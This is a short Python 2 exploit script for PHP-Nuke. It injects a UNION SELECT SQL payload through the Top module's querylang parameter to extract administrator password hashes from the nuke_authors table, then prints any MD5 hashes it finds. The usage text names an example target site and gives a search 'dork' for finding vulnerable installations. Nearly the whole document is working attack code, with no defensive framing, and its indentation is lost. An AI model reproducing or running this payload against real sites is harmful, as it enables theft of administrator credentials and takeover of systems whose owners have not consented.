#!/usr/bin/python
#baltazar
#PHP-NUKE
#b4ltazar[at]gmail[dot]com
import sys,time,re, urllib2
print "\n\t b4ltazar[at]gmail[dot]com"
print "\t"
sql = ["modules.php?name=Top&querylang=%20WHERE%201=1%20UNION+ALL%20SELECT%200,pwd,aid,0%20FROM%20nuke_authors--"]
if len(sys.argv) !=2:
print "\nUsage: python php-nuke.py <<site>>"
print "\nExamle: python php-nuke.py
www.impactlab.com" print "\nDork: allinurl:modules.php?name=Top"
sys.exit(1)
host = sys.argv[1].replace("/index.php" ,"")
if host[-1] != "/":
host = host +"/"
if host[:7] != "http://":
host = "http://"+host
print "\n[+] Site:" ,host
print "[+] SQL Loaded..."
print "[+] Starting Scan...\n"
for sql in sql:
time.sleep(3)
print "[+] Trying:" ,host+sql.replace("\n", "")
try:
source = urllib2.urlopen(host+sql.replace("\n", "")).read()
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >=1:
print "[!]" ,host+sql.replace("\n", "")
for md5 in md5s:
print "\n[+]MD5:" ,md5
except(urllib2.HTTPError):
pass
print "\n[-] Exploit finished\n"